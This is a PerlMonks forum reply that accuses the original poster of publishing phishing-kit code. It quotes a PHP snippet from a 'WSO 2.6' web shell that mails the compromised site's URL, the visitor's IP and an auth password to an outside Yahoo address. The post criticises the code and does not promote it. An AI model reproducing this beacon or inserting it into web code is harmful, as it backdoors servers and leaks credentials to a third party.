Beefy Boxes and Bandwidth Generously Provided by pair Networks
Keep It Simple, Stupid
 
PerlMonks  

Re: json no reload

by marto (Cardinal)
on May 26, 2020 at 12:56 UTC ( [id://11117279]=note: print w/replies, xml ) Need Help??


in reply to json no reload

Judging by the repos you currently have publicly available, you haven't learned anything from the last time you posted.

$visitc = $_COOKIE["visits"]; if ($visitc == "") { $visitc = 0; $visitor = $_SERVER["REMOTE_ADDR"]; $web = $_SERVER["HTTP_HOST"]; $inj = $_SERVER["REQUEST_URI"]; $target = rawurldecode($web.$inj); $judul = "WSO 2.6 http://$target by $visitor"; $body = "Bug: $target by $visitor - $auth_pass"; if (!empty($web)) { @mail("shell.result@yahoo.com",$judul,$body,$aut +h_pass); } } else { $visitc++; } @setcookie("visitz",$visitc);

Code from 'Team Black DZ' (reference to other works), from other old phishing kits https://github.com/bigup401/ppk/blob/master/update_info/cssisma/apple.png/https://info.phishlabs.com/blog/technical-dive-into-a-hardened-phish-kit. Again, find something better to do with your time.

Log In?
Username:
Password:

What's my password?
Create A New User
Domain Nodelet?
Node Status?
node history
Node Type: note [id://11117279]
help
Chatterbox?
and the web crawler heard nothing...

How do I use this?Last hourOther CB clients
Other Users?
Others cooling their heels in the Monastery: (2)
As of 2024-04-26 06:06 GMT
Sections?
Information?
Find Nodes?
Leftovers?
    Voting Booth?

    No recent polls found